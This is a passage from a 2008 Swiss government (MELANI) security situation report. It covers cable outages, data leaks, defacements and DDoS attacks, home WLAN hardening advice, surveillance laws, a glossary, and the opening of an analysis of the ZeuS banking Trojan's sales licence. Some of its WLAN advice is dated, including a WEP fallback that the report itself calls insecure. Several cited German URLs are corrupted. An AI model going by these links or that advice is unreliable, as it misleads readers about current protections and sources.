This accumulation of breakdowns led to numerous speculations concerning their origin. 13 It is
now known that at least two of the cables were damaged by ships' anchors. Generally
speaking, damage to undersea Internet cables is not rare, however. In 2007 alone, more
than 50 repairs were carried out on cables in the Atlantic. 14

These incidents bring to mind that the Internet only works thanks to physical connections.
The Internet consists of local networks connected via so-called backbones, generally fibre-
optic cables. The cables constituting the networks are not equally dense in all locations.
There are therefore locations, such as the Mediterranean, where local connection failures
cannot simply be compensated by nearby cables. If such a weak spot is affected by a
substantial failure, this may lead to temporary interference with the Internet. In general,




13
   See: http://www.economist.com/world/international/displaystory.cfm?story_id=10653963 (as of: 29.07.2008).
14
   For additional information, see: http://www.heise.de/tr/Warum-das-Netz-zusammenbrach--/artikel/103167 and
http://www.heise.de/newsticker/Satellitenbilder-klaeren-Ursachen-fuer-Seekabelbeschaedigungen--
/meldung/106502 (as of: 29.07.2008).
                                                                                                               17/48


MELANI – Semi-annual report 2008/I
Information Assurance – Situation in Switzerland and Internationally

however, the redundant structure of the Internet helps to counter failures, and the Internet
still has considerable excess capacity, helping to achieve a low level of vulnerability.




Imprudent Approach to Sensitive Data

On 30 April 2008, the Italian authorities published tax statements from the year 2005 on the
Internet. The intention of the authorities was to ensure greater transparency. However, the
tax database then broke down due to the surge of curious Internet users. The Italian data
protection authority condemned the publication of private information and demanded that the
site be blocked immediately. Much of the data was already in circulation, however. The daily
newspaper "La Stampa", for instance, had already downloaded and published numerous tax
statements.

In May 2008, a hacker published the datasets of 6 million Chileans on the Internet,
containing their names, addresses, telephone numbers, social backgrounds, and educational
experience. The hacker is alleged to have broken into Chilean government servers and
copied the data stored there. Servers of the ministry of education, the election commission,
the army, and the public telephone company were affected. According to reports, the data
were available on popular websites for several hours, where they could be freely
downloaded.

These two cases likewise illustrate the difficulty of keeping data under control that have been
published on the Internet. This must be observed both for private and for government data.
As the example of Italy and also the example of Schengen (see Chapter 4.1) show, such
data incidents are not only due to technical causes. In addition to technical security, the
approach of employees to confidential documents must also be regulated (see also Chapter
2.1).




5.2 Attacks

Politically Motivated Hacking: Lithuania and Radio Free Europe Targeted

At the end of June 2008, about 300 Lithuanian websites were defaced, including with the
emblem of the former Soviet Union (hammer and sickle). The attack took place just days
after the adoption of a Lithuanian law prohibiting the display of such Soviet emblems, among
others. The attack targeted the websites of the government, political parties, and private
companies. Most of these sites were hosted on a single physical server, where a vulnerability
was exploited.

A DDoS attack that was also probably politically motivated was directed in April 2008 against
the US-supported Radio Free Europe. The attacks mainly targeted the Radio Free Europe
service in Belarus and began on the anniversary of the Chernobyl nuclear disaster. On this
day, the radio transmitted a live broadcast of a protest action in Minsk commemorating the
suffering of the victims and speaking out against a government decree to construct a new
nuclear power plant. Apparently, the radio station was flooded with up to 50,000 commands
per second at the climax of the attack.



                                                                                                  18/48


MELANI – Semi-annual report 2008/I
Information Assurance – Situation in Switzerland and Internationally

When such attacks occur, it is extraordinarily difficult to identify the perpetrator. For
defacements, proxy bots or other IP concealment techniques are used. For DDoS attacks,
botnets are also used to disguise the identity of the perpetrators. However, it can be
assumed that both of these attacks were politically motivated. For a general assessment of
politically motivated hacking, see Chapter 2.3.




ICANN and IANA Domains Hacked

At the end of June 2008, a Turkish hacker group attacked and redirected domains of the
Internet Corporation for Assigned Names and Numbers (ICANN) and the Internet Assigned
Numbers Authority (IANA). It is nothing new that interesting and well-known domains can be
attacked. What was special about this case is that ICANN and IANA are the institutions with
control over domains and IP addresses. Apparently, several domains were affected, which
were redirected to a website of the hackers. The following comment then appeared: “You
think that you control the domains but you don’t! We control the domains including ICANN!”.
No precise information is available on the method employed by the hackers. The case
appears to demonstrate, however, that anyone can be affected by such an attack.

Such cases show how important it is for Internet hosting providers to always keep their
systems up to date. A challenge is that the websites of several clients run on the same
hosting server. When the website of a client is attacked via a weakness in one of the client’s
web applications, for example, there is a possibility that the websites of other clients will also
be affected. Conversely, an attack on the webserver itself may affect all websites stored on
it.




6 Prevention

6.1 Focus: Wireless Networks
Private Wireless Networks

Wireless networks (WLANs) have become widespread also among private individuals. Many
Internet offers already include a WLAN router. Additionally, the trend is moving more and
more clearly away from desktop computers toward portable devices with built-in wireless
network cards. The iPhone will also boost the dynamics of wireless technology.

On the other side, the security awareness of users has risen steadily in recent years. In a
report of the Swiss monthly magazine “IT-Security” 15 , 474 wireless networks were examined.
Of these, 11% were (public) hotspots, 22% unencrypted, and 67% encrypted. These non-
representative numbers are the result of a field test in the city of Zurich. They correspond to



15
     IT-Security, issue 2/2006, page 40
                                                                                                     19/48


MELANI – Semi-annual report 2008/I
Information Assurance – Situation in Switzerland and Internationally

more recent tests in Germany that found the security settings of every fifth or sixth wireless
network to be insufficient. 16 Other tests, however, give users significantly worse marks. 17 In
any event, it is likely indisputable that far too many wireless networks continue to be
insufficiently protected or not at all, especially given the steady increase in reported abuse.
For instance, potential attacks against the internal network and the recording of network
traffic constitute a threat (see Chapter 3.1).

In this section, however, the use of open wireless networks to conceal the identity of IT
criminals will be discussed. The Swiss Coordination Unit for Cybercrime Control (CYCO)
knows of various cases in which open WLANs were used to commit a crime. These included
extortion, sexual assault, and downloading of child pornography. From a security technology
standpoint, such networks are therefore associated with a considerable risk potential.

The legal situation with respect to open wireless networks is not yet fully clear. In Germany,
court decisions in recent years have attracted attention. For instance, the District Court of
Hamburg cited the principles of nuisance liability in its decision of July 2006. 18 Generally
speaking, a person is liable who, in any way, deliberately and with an appropriate causal link
participates in bringing about an unlawful nuisance. Service providers merely offering access
to third-party content who contribute indirectly to a violation of the law in the form of further
dissemination of information can also be deemed liable for nuisance. Anyone operating a
wireless Internet connection must ensure the security of his or her router, otherwise he or
she violates reasonable duties of diligence. A decision by the Court of Appeal of Düsseldorf
found that everyone is responsible for the security of their own WLAN and is accountable for
potential consequences of misuse if the security is insufficient. The court furthermore
demanded that computers used by several persons must have a separate account with a
separate password for each user. In the most recent judgement on 1 July 2008, however, the
Court of Appeal of Frankfurt am Main rejected this view. Unlimited liability of the WLAN user
would clearly go too far. While everyone is responsible for behaving in a proper and lawful
manner, this duty cannot be excessively extended to liability for unknown third parties via
nuisance liability. 19

According to CYCO’s assessment, it is not conceivable in Switzerland at this time that a
WLAN operator could be made criminally responsible. Liability pursuant to article 41 of the
Code of Obligations 20 (“Anyone unlawfully causing injury to another party, whether with intent
or through negligence, shall be responsible for compensation to that party”) is unlikely in
Switzerland at this time. This does not mean, however, that the problem of open WLANs
could not cause problems in day-to-day legal practice. Moreover, the abuse of a wireless
network could in any event cause inconvenience to the operator. If a crime is committed via a
wireless network, the corresponding IP address necessarily is reported to the investigating
law enforcement authority. Since the IP address is generally a reliable starting point, a house
search is usually conducted. Although the falsely accused person likely has nothing to fear,
this may trigger unpleasant rumours among neighbours and cause a considerable shock.




16
   http://www.lifepr.de/pressemeldungen/pc-feuerwehr-franchise-interactive-media-gmbh/boxid-20794.html (as of:
11.08.2008).
17
   http://www.pressetext.ch/pte.mc?pte=070904001 (as of: 11.08.2008).
18
   See judgement of the District Court of Hamburg: http://www.lampmannbehn.de/wlan.html (as of: 11.08.2008).
19
   See judgement of the Court of Appeal of Frankfurt: http://medien-internet-and-
recht.de/volltext.php?mir_dok_id=1671 (as of: 11.08.2008).
20
   http://www.admin.ch/ch/d/sr/220/a41.html (as of: 11.08.2008).


                                                                                                                 20/48


MELANI – Semi-annual report 2008/I
Information Assurance – Situation in Switzerland and Internationally

Operators of private wireless networks should observe the following points:

Protection of the administration page
Most WLAN access points have a user interface for administration that is accessible by
browser (http://IP_ADDRESS_OF_ACCESS_POINT). The settings described below can also
be configured with this interface. Access to this administration page is protected by a
standard password that should be changed immediately.

Wireless connection via access point
Direct wireless connections between two computers (ad hoc mode) is always relatively
unsecure. It is better to use a central access point via which all devices are connected. The
access point should be set up in such a way that only a wireless connection with the Internet
is permitted, but not a wireless connection with the internal network.

Turn off remote connection
Some base stations allow their settings to be changed externally via the Internet. This
function is intended so that employees of the manufacturer can reconfigure the base station
to remedy errors. If you do not use this remote connection, definitely turn it off.

Change the network name (SSID)
Change the default network name (SSID).

Suppress network name broadcasts
Prevent the WLAN access point from regularly broadcasting its network name (SSID). For
this, the “Broadcast SSID” option must be set to “No”.

Limit access to your devices
Limit access to your access point so that only your devices can communicate with it. This
can be done by defining the devices’ MAC addresses.

Switch on the encryption
In the WLAN hardware, activate the WPA or WPA2 encryption and select a strong password
that is difficult to guess. For WPA2-PSK, the password should be at least 20 characters.
Regularly change the keys used for encryption.
If your WLAN hardware does not yet support WPA or WPA2, activate the WEP encryption.
The WEP key (key length selected by you, if possible 128 bit) must be known to both the
access point and the end device.

RADIUS server for companies
The best security for company networks is probably provided by a RADIUS server with
WPA2. One of the tasks of RADIUS is to control access to the wireless network. The main
functions of RADIUS are authentication, authorization, and billing.

Use of password if there are several users
If the WLAN is made available to several users, access should be restricted only to these
users. The best way to do this is by agreeing on a password in advance for encryption.

Turn off access point when not in use
Turn off the access point when you are not using it, such as overnight. This gives hackers
less opportunity for attacks.

                                                                                                21/48


MELANI – Semi-annual report 2008/I
Information Assurance – Situation in Switzerland and Internationally

Public Wireless Networks

The traceability of users is also a current topic in the field of public commercial and non-
commerical providers of wireless networks. Many providers are not or only partially able to
trace an IP address and attribute it to a user. In Italy, in contrast, this has been mandated by
law since July 2005, and all operators of public wireless networks must register their users. 21
This rule applies to Internet café operators and hotels, for instance. In Switzerland, the
situation is different. Pursuant to the Federal Law on Post and Telecommunications
Surveillance (Surveillance Act), an Internet provider is defined as a telecommunications
provider or part of a telecommunications provider offering the public transmission of
information by telecommunications on the basis of IP technology using public IP addresses.
Since wireless networks as a rule do not consist of public, but rather private IP addresses,
Swiss companies or organizations offering wireless networks are accordingly not subject to
the Surveillance Act or the associated ordinance. The availability of simple options for
making a contribution to security, however, can be seen in the WLAN project of Energy
Water Lucerne. Their free WLAN offering can only be accessed by persons who have
registered in advance by text message.

A further problem is seen in the WLAN prepaid cards of large telecom providers allowing
anonymous access to WLAN hotspots. This problem brings to mind the registration
requirement for prepaid mobile telephones, which was long advocated and finally introduced
on 1 July 2004. A parliamentary motion on a registration requirement for wireless prepaid
cards, analogous to prepaid mobile phone cards, is currently pending.

It is becoming the norm to be available always and everywhere. WLAN plays an increasingly
important role for wireless connections. Especially in light of the introduction of the iPhone
and other cell phones with WLAN access, this type of communication will gain in popularity.
Moreover, it is now possible to make an Internet connection – whether by cable or wireless –
available to several persons at a low cost. Unlike cable, the range of wireless connections is
substantial, however. Especially with respect to traceability, great differences exist between
“private” and licensed providers. It should, however, be in the interest of every wireless
network user to keep one’s own network clean; adequate protection prevents the network
from being misused by third parties, and the correct attribution of an IP address in the event
of a criminal offence plays an important role in the successful suppression of Internet crime.




21
     See: http://www.csmonitor.com/2005/1004/p07s01-woeu.html (as of: 11.08.2008).
                                                                                                   22/48


MELANI – Semi-annual report 2008/I
Information Assurance – Situation in Switzerland and Internationally


7 Activities / Information

7.1 State

Germany: Debate on Online Searches Continues

At the end of February 2008, the Federal Constitutional Court of Germany decided that
online searches are only permissible under strict conditions. 22 The Constitutional Protection
Act of North Rhine-Westphalia, which provided for the secret search of private computers
without significant conditions, was thus declared void. 23 The court decided that when
conducting online searches, law enforcement officers had to respect a basic right
guaranteeing the confidentiality and integrity of IT systems. Breaches of this right are
possible both as a preventive measure and for criminal prosecution, but only under strict
conditions. An online search may only be conducted if there are “actual indications of a
concrete threat to a surpassingly important legally protected interest”. The search must be
authorized by a judge, and data concerning the absolutely protected core areas of private life
must be deleted immediately.

At the beginning of June 2008, the Federal Cabinet adopted a law expanding the
competences of the Federal Criminal Police Office (BKA) in the fight against terrorism. 24 For
the first time, the BKA will receive the power to defend against threats and thus obtain
competences going beyond investigative activities. The law provides that the BKA may carry
out online searches of private computers. Supporters emphasize the need for this law in the
fight against terrorism as well as its legal conformity, also with respect to the judgement of
the Federal Constitutional Court cited above. Opponents doubt this need and believe the law
is unconstitutional, especially with respect to separation of police and secret service
activities. Whether the law will actually enter into force in this form is questionable, since it
must still be approved by Parliament. 25

In Switzerland, online searches without concrete suspicion of an offence have been
prohibited so far. The new draft Federal Law on the Maintenance of Internal Security
provides for breaches of computers, however. This measure is likely to be carried out only in
exceptional cases and under strict conditions. The Federal Parliament has not yet
considered the draft law.




22
   For the decision of the Federal Constitutional Court, see:
http://www.bandesverfassungsgericht.de/entscheidungen/rs20080227_1bvr037007.html and for the press release
see: http://www.bandesverfassungsgericht.de/pressemitteilungen/bvg08-022.htmls (as of: 29.07.2008).
23
   For the Constitutional Protection Act of North Rhine-Westphalia, see MELANI semi-annual report 2007/2,
Chapter 7.1 http://www.melani.admin.ch/dokumentation/00123/00124/01048/index.html?lang=en (as of:
29.07.2008).
24
   For the draft law, see:
http://www.bmi.band.de/Internet/Content/Common/Anlagen/Gesetze/Entwurf__BKAG,templateId=raw,property=p
ublicationFile.pdf/Entwurf_BKAG.pdf and for further information from the Federal Ministry of the Interior, see:
http://www.bmi.band.de/nn_165104/Internet/Content/Themen/Terrorismus/DatenandFakten/Online-
Durchsuchungen.html (as of: 29.07.2008).
25
   For more information on the debate, see: http://www.heise.de/newsticker/Bandesregierung-beharrt-auf-
heimlichen-Online-Durchsuchungen--/meldung/108955 and http://www.heise.de/newsticker/Grosse-Koalition-
verteidigt-geplante-Novelle-des-BKA-Gesetzes--/meldung/109743 (as of: 29.07.2008).
                                                                                                                  23/48


MELANI – Semi-annual report 2008/I
Information Assurance – Situation in Switzerland and Internationally

France: Arming for the Fight against Cyberattacks

In June 2008, France presented its strategic orientation for defence and national security.
Some of the planned changes also concern Internet crime. Against the background of the
current threat situation, France wants to arm itself better against any cyberattacks. The
defence of network and information systems will be expanded and newly coordinated. This
will occur within the framework of a new entity, the “Agence de la sécurité des systèmes
d’information”. But France also wants to invest in offensive capabilities. The white paper also
underscores the need to strengthen cooperation at the European level in the defence against
attacks on information systems. 26

In its white paper, France emphasized that cyberspace has become a new battlefield for
military operations, requiring France to arm itself in this area as well. In fact, an increasing
number of States see the need for military action in cyberspace and are building up capacity.
These States include the US and China. 27 This indicates that more and more States are
reassessing the military potential of information systems, so that the classical armament
behaviour of sovereign States will no longer ignore cyberspace.




Sweden: Controversial Surveillance Act Adopted by Parliament

In June 2008, the Swedish Parliament passed a controversial security law expanding
surveillance powers of the military secret service. The law allows the military secret service
to monitor all Swedish e-mail, telephone, and text message traffic abroad. A court order is
not required. On the technical side, the main data connections between Sweden and foreign
countries will be installed with filters reacting to specific search terms. The law will enter into
force in January 2009. The government cites the need to identify external threats such as
terrorist or military attacks more quickly. This decision has met with fierce criticism, triggering
a major political debate in Sweden. In particular, critics fear deep breaches of civil rights
without sufficient possibilities of protection and control. A Swedish civil rights foundation has
filed a complaint with the European Court of Human Rights. 28




NATO: Excellence Centre for Cyber Defence Established in Estonia

Almost exactly one year after the computer attacks on Estonia 29 , seven NATO members
(Estonia, Germany, Italy, Latvia, Lithuania, Slovakia and Spain) signed a pact in May 2008 to
establish a Cooperative Cyber Defence Centre of Excellence in Tallinn. This centre will
reportedly house up to thirty experts. Its main focus will be on defence of computer networks




26
   Livre blanc sur la défense et la sécurité nationale, tome 1, partie 1: http://www.premier-
ministre.gouv.fr/IMG/pdf/livre_blanc_tome1_partie1.pdf (as of: 21.07.2008).
27
   See also MELANI semi-annual report 2007/1, Chapter 7.2:
http://www.melani.admin.ch/dokumentation/00123/00124/01029/index.html?lang=en (as of: 21.07.2008).
28
   For additional information, see also: http://www.economist.com/agenda/displaystory.cfm?story_id=11778941;
http://www.spiegel.de/netzwelt/web/0,1518,560637,00.html and
http://www.centrumforrattvisa.se/index.php/publisher/articleview/frmArticleID/23/ (as of: 28.07.2008).
29
   For the attack against Estonia, see MELANI semi-annual report 2007/1, Chapter 5.1:
http://www.melani.admin.ch/dokumentation/00123/00124/01029/index.html?lang=en (as of: 28.07.2008).
                                                                                                               24/48


MELANI – Semi-annual report 2008/I
Information Assurance – Situation in Switzerland and Internationally

in member countries against attacks. 30 The USA will join the project as an observer, and
other member countries are expected to join in the years to follow. NATO has Centres of
Excellence in various fields in various countries that have an advisory and research role
rather than being directly involved in operations.

Although a centre for computer defence was already planned before the attacks against
Estonia, the timing was most likely accelerated and the location fixed in reference to the
attacks. Even though it will remain difficult to find the perpetrators of such attacks, one thing
is clear: Internet crime is transnational and demands international cooperation to combat it
effectively. The member countries of this centre are also striving to develop a legal definition
of cyberattack. The need for this was also seen during the attacks against Estonia.




EU: Extension of European Network and Information Security Agency, ENISA

In June 2008, the EU Commission decided to extend the duration of the European Network
and Information Security Agency (ENISA) established in 2004 by another three years. 31
ENISA serves EU Member States and bodies as a contact and advisory office on questions
of network and information security.

The EU Commission had previously demanded reforms of ENISA, since it was said to have
insufficient resources for successfully confronting future challenges. No reforms were
included with this decision, however. Its continued existence after 2012 will be decided at a
later time.




7.2 Private Sector

Improved Security Measures for E-Banking

As already mentioned in our semi-annual report 2007/2, numerous financial institutions are
undertaking to strengthen their security mechanisms for e-banking. Improved internal filtering
systems help to identify fraudulent transfers. Some financial institutions are also introducing
new authentication methods. Since April 2008, the Zurich Cantonal Bank (ZKB) and the
Raiffeisen banks have introduced mobile transaction numbers (m-TAN). Before a transfer is
finalized, the client receives a text message for verification. This allows the client to take one
more look at currency, amount, and account number of the recipient before releasing the
payment. The online bank assumes the costs. To improve security, Migros Bank has
introduced a comprehensive USB stick solution since July 2008. All e-banking clients receive
a free USB stick and a chip card with a PIN code. The USB stick contains a hardened
browser developed especially for Migros Bank. Only this browser can access the e-banking
application. The browser installed on the computer of the client and potentially compromised
by malicious software is no longer needed.




30
   See e.g.:http://news.bbc.co.uk/2/hi/europe/7401260.stm and http://www.heise.de/security/Estland-erhaelt-
NATO-Excellence-Center-fuer-Cyber-Defense--/news/meldung/107879 (as of: 08.07.2008).
31
   http://www.enisa.europa.eu/pages/02_01_press_2008_06_13_extension.html (as of: 24.07.2008).

                                                                                                              25/48


MELANI – Semi-annual report 2008/I
Information Assurance – Situation in Switzerland and Internationally

Many financial institutions are counting on internal filtering and controlling mechanisms to
identify fraudulent transactions. Additionally, authentication methods are being adjusted to
current circumstances. With their introduction, the problems relating to e-banking malware
should subside somewhat in the coming months.




WLAN in SBB First Class Carriages

The Swiss Federal Railways SBB upgraded the business compartments in 75 first class
carriages by installing Swisscom WLAN. After several attempts – the first trials were
conducted in 2003 – the requisite infrastructure was completed at the end of March 2008 and
successfully tested.

For some time already, Mobile Unlimited cards have granted access to the Internet on trains.
These connections require a special subscription with a PCMCIA card, however. A WLAN
card and a first class ticket are now all one needs to get online with ease while travelling by
train. In addition to billing via cell phones, anonymous prepaid offers are also available.
Problems associated with such offers are described in Chapter 6.




ICANN: Creation of New Top Level Domains

At its 32nd meeting in Paris, the Internet Corporation for Assigned Names and Numbers
(ICANN) decided to create a standardized procedure for establishing new top level domains
(TLDs). It is expected that starting in the second quarter of 2009 already, anyone can in
principle apply to administer a domain name. TLDs with Cyrillic or Chinese characters will
also become available then.

Previously, Russian President Dmitry Medvedev had called for Cyrillic TLDs to be allowed,
since Russian is losing significance on the Internet in comparison with English. The opening
for new domain names was decided unanimously at the conclusion of a week-long
conference in Paris. Now, rules for granting licences will be developed. Within a limited
period, interested persons must first apply for introduction of the domain, and all applications
will be published. Any objections on grounds of racism, competitive conflicts, or too great
similarity of the addresses can be made. Four months are envisaged for the entire process.
Already in 2003, Internationalized Domain Names (IDNs) were introduced. These may
contain non-ASCII characters such as German umlauts, kanji, Hebrew, Arabic, or also
Cyrillic characters. These characters encoded in Unicode are converted by Punycode-
compatible applications into ASCII text that can be read by Internet applications. So far,
however, this only works for second level domains on down.

Internationalized domain names (IDNs) have been an integral part of the Domain Name
System (DNS) for four years already. They permit the use of country-specific special
characters at the level of second level domains; every registrar can freely decide whether
and what special characters to offer. 32 In Switzerland, these are primarily umlauts and
accents. As with the introduction of IDNs four years ago, the introduction of arbitrary TLDs
will certainly raise questions, such as first access rights and the permissibility of extensions.



32
  https://nic.switch.ch/reg/ocView.action?res=EF6GW2JBPVTG67DLNIQWQ337PUQWO2TAEBSH27Q (as of:
11.08.2008).
                                                                                                    26/48


MELANI – Semi-annual report 2008/I
Information Assurance – Situation in Switzerland and Internationally

An additional number of characters also increases the fraud potential for typo domains and
domains with similar pronunciation or spelling. The phishing trick via domains with umlauts
comes to mind. 33




8 Legal Foundations

Federal Council Rejects New Legislation to Combat Network Crime

At the end of February 2008, the Federal Council rejected new legislation to combat network
crime. According to the Federal Council, the current law suffices to successfully prosecute
offences committed by means of electronic communication networks such as the Internet or
cell phone networks. A new explicit regulation of the criminal responsibility of providers was
rejected for this reason. However, the Federal Council applied for approval of two
parliamentary motions providing for the expansion of Internet surveillance and ratification of
the Cybercrime Convention. Under the first motion, resources will be increased to expand the
monitoring and evaluation of jihadist and violent extremist Internet sites. Under the second
motion, the Federal Council supports ratification of the Council of Europe Cybercrime
Convention. The Swiss legal order already largely complies with the demands of this
Convention. The need for amendments in criminal law and criminal procedure is currently
being reviewed in detail. 34




33
   http://www.melani.admin.ch/dienstleistungen/archiv/00478/index.html?lang=en (as of: 11.08.2008).
34
   For additional information, see:
http://www.ejpd.admin.ch/ejpd/de/home/themen/kriminalitaet/ref_gesetzgebung/ref_netzwerkkriminalitaet.html (as
of: 28.07.2008).
                                                                                                                 27/48


MELANI – Semi-annual report 2008/I
Information Assurance – Situation in Switzerland and Internationally



9 Glossary
This glossary contains all terms in italics in this semi-annual report. A more detailed glossary
with more terms can be found at:
http://www.melani.admin.ch/glossar/index.html?lang=en.



Access point                         A wireless access point is an electronic device acting as an
                                     interface between a wireless network and a cable computer
                                     network.

ActiveX                              A technology developed by Microsoft to download small
                                     applications, so-called ActiveX controls, to the client’s computer
                                     from where they run when web pages are viewed. They enable
                                     different effects and functions to be carried out. Unfortunately this
                                     technology is often abused and represents a security risk. For
                                     example, dialers are downloaded through ActiveX to the computer
                                     and run. ActiveX problems only concern Internet Explorer because
                                     the other browsers do not support this technology.

Bot / Malicious Bot                  Comes from the Slavic word “robota” meaning work. Refers to a
                                     program that automatically carries out certain actions upon
                                     receiving the command. So-called malicious bots can control
                                     compromised systems remotely and have them carry out arbitrary
                                     actions.

Botnet                               A collection of computers infected with malicious bots. These can
                                     be fully remotely controlled by the attacker (the owner of the
                                     botnet). Depending on its size, a botnet may consist of several
                                     hundred to millions of compromised computers

Critical (national)                  Infrastructure or part of the economy whose failure or breakdown
infrastructure                       would have enormous consequences on national security or the
                                     economic and/or social welfare of a nation. In Switzerland the
                                     following infrastructure has been defined as critical: energy and
                                     water supply, emergency and rescue services,
                                     telecommunications, transport and traffic, banks and insurance,
                                     government and public administration. In the information age their
                                     smooth running is increasingly dependent upon information and
                                     communication systems. Systems such as these are referred to as
                                     critical information infrastructures.

Defacement                           Unauthorized alteration of websites.

DNS                                  Domain name system

                                     With the help of DNS the internet and its services can be utilised in
                                     a user-friendly way, because users can utilise names instead of IP
                                     addresses (e.g. www.melani.admin.ch).

DoS / DDoS attacks                   Denial of service attacks / Distributed denial of service attacks

                                     Have the goal of causing a loss of a specific service to users or at
                                                                                                             28/48


MELANI – Semi-annual report 2008/I
Information Assurance – Situation in Switzerland and Internationally

                                     least to considerably restrict the accessibility of the service.
                                     Distributed denial of service attacks are attacks where the victim is
                                     simultaneously attacked by many different systems.

Downloader                           Initial component of a malware infection, may lead to an infection
                                     with further malicious programs. The downloader downloads the
                                     actual virus, Trojan, etc., and launches it on the infected system.

Drive-by infection                   Infection of a computer with malware simply by visiting a website.
                                     Often the websites concerned contain reputable offerings and have
                                     already been compromised beforehand for the purposes of
                                     spreading the malware. The infection occurs mostly by trying out
                                     exploits for vulnerabilities not yet patched by the visitor.

Exploit code                         (or exploit)

                                     A program, a script or a line of code with which vulnerabilities in a
                                     computer system can be used to advantage.

Firewall                             A firewall protects computer systems by monitoring incoming and
                                     outgoing connections and rejecting them if necessary. A personal
                                     firewall (also called a desktop firewall), on the other hand, is
                                     designed to protect a stand-alone computer and is installed directly
                                     on it.

FTP                                  File Transfer Protocol (FTP) is a network protocol for transferring
                                     data via TCP/IP networks. FTP can be used, for instance, to load
                                     websites onto a webserver.

IFrame                               An IFrame (also inline frame) is an HTML element used to
                                     structure websites. It is used to integrate external web contents
                                     into one’s own website.

IP address                           Address to uniquely identify computers on the Internet or on a
                                     TCP/IP-network (e.g.: 172.16.54.87).

JavaScript                           An object-based scripting language for developing applications.
                                     JavaScripts are programme components integrated in HTML code
                                     enabling specific functions in internet browsers. For example, while
                                     checking user input on an internet form, a JavaScript can verify
                                     that all the characters entered of a telephone number are actually
                                     numbers. As is the case with ActiveX Controls, JavaScripts are run
                                     on the client's computer. Unfortunately dangerous functions can
                                     also be programmed with JavaScripts. In contrast to ActiveX,
                                     JavaScript is supported by all browsers.

Keylogger                            Devices or programmes in operation between the computer and
                                     the keyboard to record keystrokes.

MAC address                          Media Access Control Unique and globally identifiable hardware
                                     address of a network adapter. The MAC address is written in the
                                     ROM of the adapter by the respective manufacturer (e.g.
                                     00:0d:93:ff:fe:a1:96:72).

Malware/Malicious                    Comes from the terms "malicious" and "software". Generic term for
                                                                                                             29/48


MELANI – Semi-annual report 2008/I
Information Assurance – Situation in Switzerland and Internationally

Code                                 software which carries out harmful functions on a computer. This
                                     comprises amongst others viruses, worms, Trojan horses.

Patch                                Software which replaces the faulty part of a programme with a
                                     fault-free version. Patches are used to eliminate vulnerabilities.

Pharming                             Manipulation of name resolution via DNS or via local configuration
                                     (e.g. host files) with the aim of redirecting users to false servers so
                                     as to gain access to confidential data (login data).

Phishing                             Fraudsters phish in order to gain confidential data from
                                     unsuspecting Internet users. This may, for example, be account
                                     information from online auctioneers (e.g. eBay) or access data for
                                     Internet banking. The fraudsters take advantage of their victim's
                                     good faith and helpfulness by sending them e-mails with false
                                     sender addresses.

PHP                                  PHP is a scripting language mainly used to create dynamic
                                     websites or web applications.

Plugin                               (Additional) software that extends the basic functions of an
                                     application, e.g. Acrobat plugins for internet browsers allow direct
                                     display of PDF documents.

Proxy bot                            A system for accepting and forwarding browser queries. In the
                                     case of a proxy bot, this task is assumed by a botnet. The primary
                                     purpose is to anonymize identity, since the IP address displayed is
                                     that of the bot, not that of the user actually submitting the browser
                                     query.

rar                                  rar is an algorithm and file format for data compression, in order to
                                     reduce the storage space needed for the archiving and transfer of
                                     files.

Router                               Computer network, telecommunication, or also Internet devices
                                     used to link or separate several networks. Routers are used, for
                                     instance, in home networks, establishing the connection between
                                     the internal network and the Internet.

Server                               Computer system which provides clients with certain resources or
                                     data, such as storage space, services (e.g. e-mail, internet, FTP,
                                     etc.).

Social Engeneering                   Social engineering attacks take advantage of people's helpfulness,
                                     credulity or lack of self confidence in order to gain access to
                                     confidential data or to prompt them to perform certain actions, for
                                     example.

Spam                                 Spam refers to unsolicited and automatically sent mass advertis-
                                     ing, into which category spam e-mails also fall. The person re-
                                     sponsible for these messages is known as a spammer, whereas
                                     the actual sending itself is known as spamming.

SQL database                         Database built with the Structured Query Language (SQL)
                                     database language. SQL has a relatively simple structure based
                                                                                                               30/48


MELANI – Semi-annual report 2008/I
Information Assurance – Situation in Switzerland and Internationally

                                     semantically on English. SQL provides numerous commands for
                                     manipulating data pools (insert, modify, and delete datasets) and
                                     for querying data.

SQL injection                        SQL injection refers to the exploitation of a vulnerability in
                                     connection with SQL databases, resulting from insufficient
                                     verification of the variables to be transmitted. The attacker
                                     attempts to inject his own database commands, in order to change
                                     the data as desired or to gain control over the server.

SYN flood                            A SYN flood is a type of DDoS attack on a computer system. The
                                     attack employs the connection structure of the TCP transport
                                     protocol to make individual services or entire computers
                                     inaccessible from the network.

Trojan horses                        Trojan horses (often referred to as Trojans) are programs that
                                     covertly perform harmful actions while disguised as a useful
                                     application or file.

Vulnerabilities                      A loophole or bug in hardware or software through which attackers
                                     can access a system.

WEP                                  Wired Equivalent Privacy. An early encryption program used in
                                     WLAN connections, now considered insecure.

WLAN                                 WLAN stands for Wireless Local Area Network.

WPA                                  Wi-Fi Protected Access Improved encryption method used in
                                     wireless LAN connections.

WPA2                                 Wi-Fi Protected Access 2 New security standard for Wireless-LANs
                                     in accordance with IEEE 802.11i specification. Successor to the
                                     WPA technique and to the WEP technique considered to be
                                     insecure.

zip                                  zip is an algorithm and file format for data compression, in order to
                                     reduce the storage space needed for the archiving and transfer of
                                     files.




                                                                                                             31/48


MELANI – Semi-annual report 2008/I
Information Assurance – Situation in Switzerland and Internationally



10 Appendix

10.1 Professionalization of Internet Crime: The Example of
    ZeuS
For some time, a worrying trend of professionalization in Internet crime has been observed. 35
Different groups of criminals concentrate on specific areas and recruit individuals with
considerable expertise. This know-how is then provided, rented out, or sold to third parties.
The goal is of course always to make money.

One example of this division of labour can be seen in the sale of software, or rather of a bot
(= spy software), named ZeuS, which can be found in different variants and under different
names. One variant, for example, is Wsnpoem, a Trojan horse attacking e-banking systems.

An older version of this software is now freely available on the Internet, which was certainly
not the intention of its authors. An end user licence agreement is used in an attempt to limit
free distribution. Given the clientele to which it is addressed, this is likely rather difficult to
accomplish, however. The installation package also contains a detailed user manual in
Russian. We will analyze excerpts below and show how easy the use of this software is. We
will also point out the quality of support offered by the ZeuS developers.

User licence:


     1. Der Verkäufer:
            1. Leistet qualifizierten technischen Support via Internet.
            2. Trägt keine Verantwortung für:
                       Datenverlust
                       Schliessung/Abschaltung von Servern
                       Traffic-Kosten
            3. Verpflichtet sich, Fehler, die in der Funktionsweise von ZeuS gefundene wurden, zu korrigieren und
                binnen kürzester Fristen Updates ohne finanzielle Gegenleistung zuzusenden.
            4. Verpflichtet sich, beliebigen Vorschlägen/Meinungen/Rückmeldungen zur Funktionsweise von ZeuS
                Gehör zu schenken und angemessene Entscheidungen zu treffen.

     2. Der Kunde:
